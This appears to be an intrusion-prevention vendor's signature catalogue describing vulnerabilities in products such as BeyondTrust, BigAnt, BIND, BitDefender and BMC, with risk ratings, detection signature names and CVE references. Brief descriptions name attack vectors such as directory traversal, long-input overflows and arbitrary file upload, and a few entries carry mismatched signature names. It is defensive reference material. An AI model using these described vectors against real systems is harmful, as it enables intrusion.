http://www.osvdb.org/13199

Beyondtrust-Command-Injection-CVE-2024-12356

About this vulnerability:

An attempt to exploit a vulnerability in BeyondTrust products detected

Risk:

High

First detected in:

sgpkg-ips-1837-5242

Last changed:

sgpkg-ips-1837-5242

Platform:

Generic

Software:

BeyondTrust Remote Support

Type:

Input Validation

Description:

A critical vulnerability has been discovered in BeyondTrust's Privileged Remote Access (PRA) and Remote Support (RS) products, which can allow an unauthenticated attacker to inject commands that are run as a site user.

Situation:

WebSocket_CS-Beyondtrust-Command-Injection-CVE-2024-12356

References:

CVE-2024-12356
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-12356

Beyondtrust-Remote-Support-Cross-Site-Scripting-CVE-2021-31589

About this vulnerability:

A vulnerability in BeyondTrust Remote Support

Risk:

Moderate

First detected in:

sgpkg-ips-1502-5242

Last changed:

sgpkg-ips-1502-5242

Platform:

Generic

Software:

BeyondTrust Remote Support

Type:

Input Validation

Description:

A reflected cross-site scripting vulnerability has been reported in BeyondTrust Remote Support versions up to 6.0.1. A successful exploit allows an attacker to run arbitrary scripts in the target user's browser.

Situation:

HTTP_CRL-Beyondtrust-Remote-Support-Cross-Site-Scripting-CVE-2021-31589

References:

CVE-2021-31589
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31589

Big-Brother-Cgi-Vulnerability

About this vulnerability:

Big Brother CGI script vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1637-5242

Platform:

Generic

Software:

Big Brother

Type:

Directory Traversal

Description:

The Big Brother scripts (specifically bb-histlog.sh, bb-histsvc.sh, bb-rep.sh, bb-replog.sh, bb-hist.sh) contain a file disclosure vulnerability that allows viewing of any text files on the system readable by the Web server.

References:

CVE-1999-1462
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1462

BID-142
http://www.securityfocus.com/bid/142

BigAnt-Buffer-Overflow

About this vulnerability:

A vulnerability in BigAnt

Risk:

High

First detected in:

sgpkg-ips-754-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

BigAntSoft BigAnt Server

Type:

Input Validation

Description:

There exists a buffer overflow vulnerability in BigAnt.

Situation:

Generic_CS-BigAnt-Buffer-Overflow

References:

OSVDB-61386
http://www.osvdb.org/61386

BigAnt-IM-Server-2.2-Buffer-Overflow

About this vulnerability:

BigAnt IM Server 2.2 Stack Based Buffer Overflow

Risk:

High

First detected in:

sgpkg-ips-648-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

BigAntSoft BigAnt Server

Type:

Buffer Overflow

Description:

A stack based buffer overflow vulnerability in BigAnt IM Server 2.2, which allows attackers to remotly execute arbitrary code or cause a denial of service via a long URI in a TCP request.

Situation:

Generic_CS-BigAnt-IM-Server-2.2-Buffer-Overflow

References:

CVE-2008-1914
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1914

BID-28795
http://www.securityfocus.com/bid/28795

OSVDB-44454
http://www.osvdb.org/44454

BigAnt-Server-Ddnf-Request-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in BigAntSoft BigAnt Server

Risk:

Moderate

First detected in:

sgpkg-ips-520-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

BigAntSoft BigAnt Server

Type:

Buffer Overflow

Description:

There is a stack buffer overflow vulnerability in BigAnt Server. The vulnerability is due to a boundary error when handling DDNF requests. Remote unauthenticated attackers can exploit this vulnerability by sending malicious requests to the target server. Successful exploitation would result in arbitrary code injection and execution with the privileges of the target server. If exploitation is unsuccessful, the affected application will terminate abnormally.

Situation:

Generic_CS-BigAnt-Server-Ddnf-Request-Stack-Buffer-Overflow

References:

OSVDB-92239
http://www.osvdb.org/92239

BigAnt-Server-Dupf-Command-Arbitrary-File-Upload

About this vulnerability:

A vulnerability in BigAntSoft BigAnt Server

Risk:

Moderate

First detected in:

sgpkg-ips-520-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

BigAntSoft BigAnt Server

Type:

Directory Traversal

Description:

An arbitrary file upload vulnerability exists in BigAnt Server. The vulnerability is due to lack of authentication and a directory traversal weakness in processing a DUPF command. Remote unauthenticated attackers can exploit this vulnerability by sending malicious requests to the target server. Successful exploitation would result in arbitrary code execution with the privileges of the System user.

Situation:

Generic_CS-BigAnt-Server-Dupf-Command-Arbitrary-File-Upload

References:

CVE-2012-6274
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6274

BID-57214
http://www.securityfocus.com/bid/57214

OSVDB-89342
http://www.osvdb.org/89342

BigAnt-Server-SCH-Request-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in BigAntSoft BigAnt Server

Risk:

Moderate

First detected in:

sgpkg-ips-514-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

BigAntSoft BigAnt Server

Type:

Buffer Overflow

Description:

There is a stack buffer overflow vulnerability in BigAnt Server. The vulnerability is due to a boundary error when handling SCH and DUPF requests. Remote unauthenticated attackers can exploit this vulnerability by sending malicious requests to the target server. Successful exploitation would result in arbitrary code injection and execution with the privileges of the target server. If exploitation is unsuccessful, the affected application will terminate abnormally.

Situation:

Generic_CS-BigAnt-Server-SCH-Request-Stack-Buffer-Overflow

References:

CVE-2012-6275
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6275

BID-57214
http://www.securityfocus.com/bid/57214

OSVDB-89344
http://www.osvdb.org/89344

BillQuick-Web-Suite-SQL-Injection-CVE-2021-42258

About this vulnerability:

An attempt to exploit a vulnerability in BillQuick Web Suite detected

Risk:

High

First detected in:

sgpkg-ips-1405-5242

Last changed:

sgpkg-ips-1405-5242

Platform:

Generic

Software:

BillQuick Web Suite

Type:

Malfunction

Description:

There exists an SQL injection vulnerability in BillQuick Web Suite versions before 22.0.9.1. Successful exploitation may allow remote code execution without authentication.

Situation:

HTTP_CRL-BillQuick-Web-Suite-SQL-Injection-CVE-2021-42258

References:

CVE-2021-42258
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42258

Binary_RealPlayer-RealMedia-Security-Bypass

About this vulnerability:	A vulnerability in RealPlayer
Risk:	High
First detected in:	sgpkg-ips-413-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	RealPlayer
Type:	Input Validation
Description:	A vulnerability exists in the way that RealNetworks line of RealPlayer products handle clip-encoded URLs. A malicious website can load a local HTML document within the Microsoft HTML viewer control in the local zone security context by using a specially crafted RealMedia file. An attacker exploiting this flaw can bypass certain security restrictions.
Situation:	File-Binary_RealPlayer-RealMedia-Security-Bypass

BIND-Inverse-Infoleak

About this vulnerability:

BIND server infoleak vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-179-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

BIND

Type:

Malfunction

Description:

BIND DNS servers has a vulnerability that allows remote client to read sensible information. This information can be used to verity existance of other vulnerabilities and to craft attacks leading to remote compromise of the server host.

Situation:

DNS-UDP_Inverse-Infoleak-2
DNS-UDP_Inverse-Infoleak

References:

CVE-2001-0012
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0012

BID-2321
http://www.securityfocus.com/bid/2321

BIND-Inverse-Query-BO

About this vulnerability:

Inverse Query Buffer Overflow in BIND 4.9 and BIND 8 releases

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

BIND

Type:

Buffer Overflow

Description:

The ISC BIND DNS daemon and its derivatives contain a buffer overflow vulnerability that is exploitable via inverse query. Once exploited, the attacker may be able to execute arbitrary code as the user under which the MDNS daemon is being run. This user is most likely "root".

Situation:

DNS-TCP_X86-Iquery-BOF-1
DNS-TCP_X86-Iquery-BOF-2
DNS-TCP_X86-Iquery-BOF-3
DNS-TCP_Iquery-BOF-12
DNS-TCP_X86-Iquery-BOF-6
DNS-TCP_X86-Iquery-BOF-7
DNS-TCP_X86-Iquery-BOF-9
DNS-TCP_X86-Iquery-BOF-8
DNS-TCP_X86-Iquery-BOF-11
DNS-TCP_X86-BOF-10
DNS-TCP_Iquery-ADM-W0rm-Detection

References:

CVE-1999-0009
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0009

BID-134
http://www.securityfocus.com/bid/134

BIND-NXT-BO

About this vulnerability:

NXT buffer overflow

Risk:

Moderate

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

HP-UX; Solaris; IRIX; AIX; Linux; BSD

Software:

BIND

Type:

Buffer Overflow

Description:

The BIND DNS daemon contains a buffer overflow vulnerability that is exploitable via malicious NXT record. Once exploited, the attacker may be able to execute arbitrary code as the user under which the DNS daemon is being run. This user is most likely "root".

Situation:

DNS-TCP_X86-BSD-NXT-BOF-1
DNS-TCP_MIPS-IRIX-NXT-BOF
DNS-TCP_X86-Linux-NXT-BOF-1
DNS-TCP_X86-BSD-NXT-BOF-2
DNS-TCP_X86-Linux-NXT-BOF-2
DNS-TCP_Sparc-Solaris-NXT-BOF-1
DNS-TCP_X86-Linux-NXT-BOF-3

References:

CVE-1999-0833
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0833

BID-788
http://www.securityfocus.com/bid/788

BIND-Opt-Subdomain-Denial-Of-Service

About this vulnerability:

BIND denial of service

Risk:

High

First detected in:

sgpkg-ips-6-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

BIND

Type:

Malfunction

Description:

An attacker can crash the name server by requesting a non-existent subdomain and an OPT record with a large UDP payload.

Situation:

DNS-UDP_BIND-Opt-Subdomain-Denial-Of-Service

References:

CVE-2002-1220
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1220

BID-6161
http://www.securityfocus.com/bid/6161

BIND-Tsig-BO

About this vulnerability:

TSIG Record Handling Buffer Overflow in Named 8

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

BIND

Type:

Buffer Overflow

Description:

The ISC BIND DNS daemon version 8.2 and its derivatives contain a buffer overflow vulnerability in TSIG record handling. That vulnerability can be remotely exploited and successful exploit leads to remote root compromise. Public sample exploits do exists.

Situation:

DNS-UDP_BIND-Tsig-X86-Linux-BOF
DNS-UDP_BIND-Tsig-X86-Linux-BOF-2
DNS-UDP_BIND-Tsig-X86-BOF

References:

CVE-2001-0010
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0010

BID-2302
http://www.securityfocus.com/bid/2302

BIND-Version-Query

About this vulnerability:	BIND server version query
Risk:	Low
First detected in:	sgpkg-ips-1-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	BIND
Type:	Insecure Configuration
Description:	BIND DNS servers has a feature that allows remote client to query server's version number. This version number information can be used to determine whether the server is vulnerable to some more dangerous exploits and thus system comrpomise. DNS version queries are often of malicious purpose.
Situation:	DNS-TCP_Nameserver-Version-Query DNS-UDP_Nameserver-Version-Query

BisonFTP-Server-Directory-Traversal

About this vulnerability:

A BisonFTP Server Directory Traversal vulnerability

Risk:

High

First detected in:

sgpkg-ips-774-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Bisonware FTP Server

Type:

Directory Traversal

Description:

A vulnerability in BisonFTP Server, version 3.5, which allows remote attackers to read arbitrary files via a ../ directory traversal in the RETR command.

Situation:

FTP_CS-Attempted-FTP-Directory-Traversal

References:

CVE-2015-7602
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602

Bisonware-FTP-Server-Buffer-Overflow

About this vulnerability:

A Bisonware FTP Server Buffer Overflow vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-769-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Bisonware FTP Server

Type:

Buffer Overflow

Description:

A vulnerability in Bisonware FTP Server, versions before 4.1, which allows remote attackers to cause a denial of service condition and execute arbitrary code via a long USER, LIST, or CWD command.

Situation:

FTP_CS-ProFTPD-FTP-Server-Telnet-IAC-Stack-Buffer-Overflow

References:

CVE-1999-1510
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1510

BID-49109
http://www.securityfocus.com/bid/49109

Bitcoin-Bot

About this vulnerability:	Bitcoin bot
Risk:	High
First detected in:	sgpkg-ips-619-5211
Last changed:	sgpkg-ips-1468-5242
Platform:	Windows
Software:	Bitcoin
Type:	Code Injection
Description:	Bitcoin bots can be used for mining the cryptocurrency Bitcoin. Bitcoin mining is an energy intensive process and is sometimes used to monetize botnet victims.
Situation:	HTTP_CSU-Bitcoin-Bot-Traffic

Bitcoin-Miner-Getwork-JSON-Request

About this vulnerability:	Bitcoin Miner getwork JSON request detected
Risk:	Low
First detected in:	sgpkg-ips-520-5211
Last changed:	sgpkg-ips-1588-5242
Platform:	Generic
Software:	Bitcoin
Type:	Peer-to-Peer
Description:	A Getwork-request in application/json context is most likely caused by a bitcoin-compatible cryptocurrency mining application. Bitcoin mining is an energy intensive process and is sometimes used to monetize botnet victims.
Situation:	HTTP_CS-Bitcoin-Miner-Getwork-JSON-Request

BitDefender-AntiVirus-PDF-Processing-Memory-Corruption

About this vulnerability:

A heap corruption vulnerability in BitDefender AntiVirus

Risk:

High

First detected in:

sgpkg-ips-189-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

BitDefender; BitDefender Internet Security; BitDefender Total Security

Type:

Malfunction

Description:

There is a memory corruption vulnerability in various BitDefender security products. The BitDefender PDF Scanner plugin pdf.xmd does not correctly handle crafted PDF documents, leading to a memory corrution. A remote attacker can exploit this vulnerability by delivering a crafted PDF file to the vulnerable system, potentially causing arbitrary code to be injected and executed in the security context of the current user.

Situation:

HTTP_SS-BitDefender-AntiVirus-PDF-Processing-Memory-Corruption
File-PDF_BitDefender-AntiVirus-PDF-Processing-Memory-Corruption

References:

BID-32396
http://www.securityfocus.com/bid/32396

BitDefender-Internet-Security-Filename-Cross-Script-Script-Code-Execution

About this vulnerability:

A vulnerability in BitDefender Internet Security

Risk:

Moderate

First detected in:

sgpkg-ips-214-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

BitDefender Internet Security

Type:

Input Validation

Description:

There is a cross-site scripting vulnerability in BitDefender Internet Security software. The vulnerability is due to insufficient input validation when scanning maliciously crafted archive files. Remote attackers can exploit this vulnerability by enticing the target users to scan a malicious archive file, which may lead to script execution in the local security zone.

Situation:

HTTP_SS-Suspicious-Filename-In-Gzip-Compressed-Archive
HTTP_SS-Suspicious-Filename-In-Zip-Archive
File-Binary_Suspicious-Filename-In-Gzip-Compressed-Archive
File-Zip_Suspicious-Filename-In-Archive

References:

CVE-2009-0850
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0850

BID-33921
http://www.securityfocus.com/bid/33921

BitDefender-Online-Scanner-ActiveX-Control-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in BitDefender Online Scanner

Risk:

High

First detected in:

sgpkg-ips-133-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Softwin BitDefender Online Scanner

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in BitDefender Online Scanner. The vulnerability is due to boundary errors in the BitDefender Online Scanner OScan.ocx ActiveX Control. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted web page, potentially causing arbitrary code to be injected and executed in the security context of the current user.

Situation:

HTTP_SS-BitDefender-Online-Scanner-ActiveX-Control-Buffer-Overflow
File-Text_BitDefender-Online-Scanner-ActiveX-Control-Buffer-Overflow

References:

CVE-2007-5775
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5775

BID-26210
http://www.securityfocus.com/bid/26210

BitTorrent-Over-Port-80

About this vulnerability:	BitTorrent usage detected on port 80
Risk:	Moderate
First detected in:	sgpkg-ips-429-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	BitTorrent
Type:	Insecure Configuration
Description:	BitTorrent usage detected on port 80
Situation:	HTTP_CSH-BitTorrent-Over-Port-80 HTTP_SHS-BitTorrent-Over-Port-80

BitTorrent-Peer-To-Peer-Network-Usage

About this vulnerability:	BitTorrent peer-to-peer network usage
Risk:	Moderate
First detected in:	sgpkg-ips-21-1210
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	BitTorrent; uTorrent; Azureus; BitComet; rtorrent; Deluge
Type:	Peer-to-Peer
Description:	BitTorrent is a peer-to-peer network that can be used to share files. File sharing can expose to security risks if unintentionally sharing confidential files or downloading files that contain malicious content such as viruses, worms, or backdoors.
Situation:	Generic_UDP-BitTorrent-UDP-Traffic Shared_CS-BitTorrent-Tracker-Request Shared_CS-BitTorrent-Network-Connect Shared_SS-BitTorrent-Tracker-Response Shared_SS-BitTorrent-Network-Connect Shared-UDP_CS-BitTorrent-Network-Connect HTTP_CSH-Transmission-P2P-Client HTTP_CSH-KTorrent-Client HTTP_CSH-Opera-BitTorrent-Client HTTP_CSH-BitTornado-P2P-Client HTTP_CSH-Enhanced-CTorrent-P2P-Client HTTP_CSH-Deluge-P2P-Client HTTP_CSH-FDM-P2P-Client HTTP_CSH-BTSP-P2P-Client HTTP_CSH-Shareaza-P2P-Client HTTP_SS-BitTorrent-Torrent-Metainfo-File-Download P2P-UDP_BitTorrent-DHT-Protocol-Usage HTTP_CSH-P2P-uTorrent-Client HTTP_CSH-BitComet-Client HTTP_CSH-Azureus-Client HTTP_CSH-BitTorrent-Client HTTP_CSH-Deluge-Client HTTP_CSH-rtorrent-Client HTTP_CSH-Blizzard-Downloader-Usage File-TextId_BitTorrent-Torrent-Metainfo-File File-TextId_BitTorrent-Tracker-Response

Bitweaver-Overlay_Type-Directory-Traversal

About this vulnerability:

A Bitweaver Overlay_Type Directory Traversal vulnerability.

Risk:

High

First detected in:

sgpkg-ips-705-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Bitweaver

Type:

Directory Traversal

Description:

A directory traversal vulnerability in Bitweaver 2.8.1 in the overlay_type parameter within gmap/view_overlay.php, which allows remote attackers to read arbitrary files via an encoded dot-dot (%2F) sequence.

Situation:

File-Text_Black-Ice-BIDIB.ocx-ActiveX-Arbitrary-File-Download

References:

CVE-2012-5192
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5192

OSVDB-86599
http://www.osvdb.org/86599

Black-Ice-BIDIB.ocx-ActiveX-Arbitrary-File-Download

About this vulnerability:

A Black Ice BIDIB.ocx ActiveX Arbitrary File Download vulnerability.

Risk:

High

First detected in:

sgpkg-ips-732-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Black Ice

Type:

Input Validation

Description:

A vulnerability in Black Ice, in the ActiveX control in BIDIB.ocx, version 10.9.3.0, which allows remote attackers to force a download of arbitrary files by specifying the origin URL in the first argument to the DownloadImageFileURL method, and the local filename in the second argument.

Situation:

References:

CVE-2008-2683
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2683

BID-29577
http://www.securityfocus.com/bid/29577

OSVDB-46007
http://www.osvdb.org/46007

Blackenergy-Bot

About this vulnerability:	BlackEnergy bot
Risk:	High
First detected in:	sgpkg-ips-616-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Blackenergy is a Windows malware that can be remote controlled.
Situation:	HTTP_CRL-Blackenergy-Bot-Traffic

Blackmatter-Ransomware-Remote-Encryption-Attempt

About this vulnerability:	BlackMatter ransomware remote encryption attempt was detected
Risk:	High
First detected in:	sgpkg-ips-1397-5242
Last changed:	sgpkg-ips-1397-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	BlackMatter ransomware remote encryption attempt was detected.
Situation:	SMB-TCP_Blackmatter-Ransomware-Remote-Encryption-Attempt

Blazefind

About this vulnerability:	BlazeFind
Risk:	Low
First detected in:	sgpkg-ips-615-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	BlazeFind
Type:	Misconfiguration
Description:	BlazeFind is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation:	HTTP_CSH-Blazefind HTTP_CRL-Blazefind

BlazeVideo-BlazeDVD-Pro-PLF-File-Processing-Buffer-Overflow

About this vulnerability:

A vulnerability in BlazeVideo BlazeDVD Professional

Risk:

Moderate

First detected in:

sgpkg-ips-602-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

BlazeVideo BlazeDVD Professional

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability exists in BlazeVideo BlazeDVD Pro. The vulnerability is due to a boundary error when processing playlist files. Remote attackers could exploit this vulnerability by persuading users to open such a file using a vulnerable version of the application. Successful exploitation would cause a stack buffer overflow that could allow the attacker to execute arbitrary code in the context of the logged in user.

Situation:

File-Text_BlazeVideo-BlazeDVD-Pro-PLF-File-Processing-Buffer-Overflow

References:

BID-69220
http://www.securityfocus.com/bid/69220

OSVDB-105679
http://www.osvdb.org/105679

Blizzard-World-Of-Warcraft-Usage

About this vulnerability:	World of Warcraft online game usage
Risk:	Low
First detected in:	sgpkg-ips-138-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Blizzard World of Warcraft
Type:	Online Game
Description:	World of Warcraft is a massively multiplayer online role-playing game (MMORPG) created by Blizzard Entertainment.
Situation:	Generic_SS-Blizzard-World-Of-Warcraft Generic_CS-Blizzard-World-Of-Warcraft-Login HTTP_CSH-Blizzard-Downloader-Usage HTTP_CSH-Blizzard-World-Of-Warcraft-Usage

Blogspot-Malicious-Script-HTML

About this vulnerability:	Blogspot Malicious Script in HTML page detected
Risk:	High
First detected in:	sgpkg-ips-1369-5242
Last changed:	sgpkg-ips-1386-5242
Platform:	Generic
Software:	<os>
Type:	Backdoor
Description:	Malicious script (partially or fully obfuscated), most likely hosted on Blogspot was detected.
Situation:	File-Text_Malicious-Script-Blogspot-A-Detected File-Text_Malicious-Script-Blogspot-Detected

Bludit-CMS-Upload-Images.php-Arbitrary-File-Upload

About this vulnerability:

A vulnerability in Blundit

Risk:

Moderate

First detected in:

sgpkg-ips-1209-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Blundit

Type:

Input Validation

Description:

Improper validation of image uploads by upload-images.php causes a vulnerability in the Blubnit CMS. A successful exploit allows an attacker to upload and execute arbitrary files on the target system.

Situation:

HTTP_CSH-Bludit-CMS-Upload-Images.php-Arbitrary-File-Upload

References:

CVE-2019-16113
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16113

Bludit-Directory-Traversal-Image-File-Upload

About this vulnerability:

A vulnerability in Bludit

Risk:

High

First detected in:

sgpkg-ips-1206-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Bludit

Type:

Input Validation

Description:

There exists a vulnerability in Bludit, version 3.9.2, which allows remote attackers to upload arbitrary files to the server and execute remote code due to insufficient user input validation in the uuid parameter.

Situation:

HTTP_CRL-Bludit-Directory-Traversal-Image-File-Upload

References:

CVE-2019-16113
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16113

Blue-Coat-Authentication-Proxy-Buffer-Overflow

About this vulnerability:

A Blue Coat Authentication Proxy Buffer Overflow vulnerability.

Risk:

High

First detected in:

sgpkg-ips-713-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Blue Coat Authentication Proxy

Type:

Buffer Overflow

Description:

A stack based buffer overflow vulnerability in Blue Coat Authentication Proxy, versions before build 60258, which allows remote attackers to execute arbitrary code via a large packet to the synchronization port.

Situation:

Generic_CS-Blue-Coat-Authentication-Proxy-Buffer-Overflow

References:

CVE-2011-5124
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-5124

OSVDB-72095
http://www.osvdb.org/72095

Blue-Coat-BCAAA-Stack-Buffer-Overflow

About this vulnerability:	A Blue Coat BCAAA Stack Buffer Overflow vulnerability
Risk:	High
First detected in:	sgpkg-ips-999-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Blue Coat BCAAA
Type:	Buffer Overflow
Description:	A buffer overflow vulnerability in Blue Coat BCAAA which allows remote attackers to execute arbitrary code by sending a malicious request to tcp port 16102/TCP.
Situation:	Generic_CS-Blue-Coat-BCAAA-Stack-Buffer-Overflow

Blue-Coat-WinProxy-Host-Header-Buffer-Overflow

About this vulnerability:

Host header parsing buffer overflow vulnerability in Blue Coat WinProxy

Risk:

High

First detected in:

sgpkg-ips-54-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Blue Coat Systems WinProxy

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in Blue Coat Systems WinProxy version 6.0 (and possibly in earlier versions). The software fails to validate the length of the user supplied host header field before copying it into static buffers. A remote attacker is able to exploit this vulnerability to execute arbitrary code on the victim host.

Situation:

HTTP_CSH-Blue-Coat-WinProxy-Host-Header-Buffer-Overflow

References:

CVE-2005-4085
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4085

BID-16147
http://www.securityfocus.com/bid/16147

Blueimp-jQuery-Arbitrary-File-Upload

About this vulnerability:

A vulnerability in Blueimp

Risk:

High

First detected in:

sgpkg-ips-1174-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Blueimp

Type:

Insecure Configuration

Description:

A vulnerability in Blueimp, versions 9.22.0 and before, which allows remote attackers to upload arbitrary files through the sample PHP upload handler in the jQuery File Upload widget.

Situation:

HTTP_CS-Blueimp-jQuery-Arbitrary-File-Upload

References:

CVE-2018-9206
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9206

Bmc-BladeLogic-Server-Automation-RSCD-Agent-RCE

About this vulnerability:

A vulnerability in BMC BladeLogic Server Automation

Risk:

Moderate

First detected in:

sgpkg-ips-1116-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows; Linux

Software:

BMC BladeLogic Server Automation

Type:

Insecure Configuration

Description:

A vulnerability in BMC BladeLogic Server Automation, versions 8.2.x, 8.3.x, 8.5.x, 8.6.x, and 8.7.x, which allows remote attackers to run arbitrary system commands without authentication due to the weak access control check in the RSCD agent.

Situation:

Generic_CS-Bmc-BladeLogic-Server-Automation-RSCD-Agent-RCE

References:

CVE-2016-1543
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1543

Bmc-Patrol-Agent-Command-Execution

About this vulnerability:

A vulnerability in BMC Patrol Agent

Risk:

High

First detected in:

sgpkg-ips-1198-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows; Linux

Software:

BMC Patrol Agent

Type:

Input Validation

Description:

A vulnerability in BMC Patrol Agent which allows remote attackers to execute arbitrary code due to insufficient input validation.

Situation:

Generic_CS-Bmc-Patrol-Agent-Command-Execution

References:

CVE-2018-20735
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20735

Bmc-Track-It-Arbitrary-File-Upload

About this vulnerability:

A Bmc Track-It Arbitrary File Upload vulnerability.

Risk:

High

First detected in:

sgpkg-ips-769-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

BMC TrackIt

Type:

Directory Traversal

Description:

A vulnerability in BMC TrackIt, version 11.3.0.355, which allows remote attackers to upload arbitrary files, execute arbitrary code, and obtain sensitive information via a .NET remoting request to FileStorageService or ConfigurationService.

Situation:

Generic_CS-Bmc-Track-It-Arbitrary-File-Upload

References:

CVE-2014-4872
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4872

OSVDB-112741
http://www.osvdb.org/112741

Bmc-TrackIt-Password-Reset

About this vulnerability:

A BMC TrackIt Password Reset vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-763-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

BMC TrackIt

Type:

Insecure Configuration

Description:

A vulnerability in BMC TrackIt, version 11.3, which allows remote attackers to reset domain credentials, gain privileges and possibly execute arbitrary code.

Situation:

HTTP_CSU-Bmc-TrackIt-Password-Reset

References:

CVE-2014-8270
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8270

BMP-Windows-Media-Player-BMP-Header-Dataoffset-Buffer-Overflow

About this vulnerability:

BMP header parsing vulnerability in Windows Media Player (MS06-005)

Risk:

High

First detected in:

sgpkg-ips-59-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Windows Media Player

Type:

Buffer Overflow

Description:

Windows Media Player does not parse BMP files correctly. A BMP header with a DataOffset value lower than 0x0e will cause an integer underflow and a buffer overflow, allowing arbitrary code execution.

Situation:

HTTP_Windows-Media-Player-BMP-Header-Dataoffset-Buffer-Overflow
E-Mail_BS-Windows-Media-Player-BMP-Header-Dataoffset-Buffer-Overflow
File-Binary_Windows-Media-Player-BMP-Header-Dataoffset-Buffer-Overflow

References:

CVE-2006-0006
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0006

BID-16633
http://www.securityfocus.com/bid/16633

MS06-005
http://technet.microsoft.com/security/bulletin/MS06-005

Boa-Web-Server-Arbitrary-File-Read-CVE-2017-9833

About this vulnerability:

A vulnerability in Boa Web Server

Risk:

High

First detected in:

sgpkg-ips-1536-5242

Last changed:

sgpkg-ips-1536-5242

Platform:

Generic

Software:

Boa Web Server

Type:

Input Validation

Description:

An arbitrary file read vulnerability has been reported in Boa Web Server 0.94.14. A remote attacker could use this to disclose information which could be used to further compromise the server. Note that the CVE entry has been marked as disputed due to multiple third parties reporting that only certain cameras are vulnerable.

Situation:

HTTP_CSU-Boa-Web-Server-Arbitrary-File-Read-CVE-2017-9833

References:

CVE-2017-9833
